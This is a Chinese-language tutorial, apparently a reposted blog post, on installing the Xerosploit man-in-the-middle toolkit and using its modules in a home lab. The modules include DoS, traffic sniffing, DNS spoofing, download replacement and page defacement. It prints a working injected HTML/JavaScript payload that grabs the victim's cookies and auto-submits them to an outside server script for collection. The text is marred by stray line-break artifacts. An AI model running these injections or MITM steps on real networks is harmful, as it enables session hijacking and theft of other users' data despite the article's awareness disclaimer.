你的內網對黑客完全透明!(Xerosploit 使用)
i春秋首發,由於版權原因更新遲了幾天。
Xerosploit is a penetration testing toolkit whose goal is to perform man in the middle attacks for testing purposes. It brings various modules that allow to realise efficient attacks, and also allows to carry out denial of service attacks and port scanning. Powered by bettercap and nmap.
以上是官方介紹,翻譯過來大致為:Xerosploit是一個滲透測試工具包,通過調用bettercap與nmap,可以進行中間人攻擊。它具有各種模塊,可以實現高效的攻擊,並允許執行拒絕服務攻擊和埠掃描。
nn測試環境:
- - kali2016.2(192.168.0.5 已經安裝bettercap與nmap)
- - windows 10(192.168.0.4)
- - 安卓手機(192.168.0.2)
一.安裝
n首先在github將源代碼克隆到本機
git clone LionSec/xerosploitn
n切換到下載目錄,執行安裝文件
cd xerosploit/nn ./install.py n
n當返回「Xerosploit has been sucessfuly instaled. Execute xerosploit in your terminal.」表示安裝已經完成。
二.使用n啟動軟體 xerosploitn
n啟動後工具會自動檢測所處網路的相關信息
scan : Map your network. 掃描:掃描你的網路 niface : Manually set your network interface. 介面:手動設置網路介面。 ngateway: Manually set your gateway. 網關:手動設置網關地址 nstart : Skip scan and directly set your target IP address. 啟動:跳過掃描直接啟動並攻擊指定ipnrmlog : Delete all xerosploit logs. 刪除日誌:刪除工具所有日誌 nhelp : Display this help message. 幫助菜單 nexit : Close Xerosploit. 退出 n
執行「scan」掃描網路
n輸入本次目標的ip地址
執行「help」查看所有模塊及相關介紹pscan : Port Scanner 埠掃描 dos : DoS Attack DOS攻擊 ping : Ping Request ping請求 injecthtml : Inject Html code 注入HTML代碼 injectjs : Inject Javascript code 注入javascript代碼 rdownload : Replace files being downloaded 替換下載文件 sniff : Capturing information inside network packets 捕獲網路數據包內的信息 ndspoof : Redirect all the http traffic to the specified one IP 將所有http流量重定向到指定的一個IP nyplay : Play background sound in target browser 在目標瀏覽器中播放背景音樂 nreplace : Replace all web pages images with your own one 替換所有網頁圖像 ndriftnet : View all images requested by your targets 查看目標請求的圖片 move : Shaking Web Browser content 這個功能會讓網頁產生跳動的效果 deface : Overwrite all web pages with your HTML code 通過指定哥HTML覆蓋整個頁面 n
n由於部分模塊功能基本相同,所有下面將介紹部分模塊的使用:
- pscan模塊:
- injecthtml模塊:
<iframe name="iframe" width_="0px" height="0px"></iframe>nt<html>nt <body>nt <form target="iframe" id=cookief arget="iframe" action="http://192.168.0.4/test/hack.php" method="post">nt t<input id=cookie name="cookie" type="hidden" ><br>nt </form>nt <script type="text/javascript">nt function cookief() {nt var cookie=document.getElementById(cookie).value=document.cookie;nt var csrffrom = document.getElementById(cookief);nt document.getElementById(cookief).submit();nt }nt setTimeout(cookief(),2000);nt </script>nt </body>nt</html>n
n以上代碼段會獲取訪問URL的cookie 並發送到指定伺服器腳本進行處理。
n調用injecthtml模塊並注入以上代碼當目標訪問網頁時,會在請求返回中注入代碼,並將cookie發送到指定伺服器保存,保存結果如下;- rdownload模塊:
- sniff模塊:
- dspoof模塊:
- yplay模塊:
- replace模塊:
- driftnet模塊:
- move模塊:
其他無線內網安全:
知乎專欄
知乎專欄
知乎專欄
知乎專欄
註: 文章用於提醒普通網民對個人信息保護的重視,切勿用於非法用途。
推薦閱讀:
※如何用一台印表機竊取老闆的機密信息?
※Cyber-Security:Linux容器安全的十重境界
※APT案例分析:一個基於Meterpreter和Windows代理的攻擊事件
※使用 Burp Infiltrator 進行漏洞挖掘
※威脅警報:Cisco IOS高危漏洞觸發Rockwell工業系統危機
TAG:网络安全 |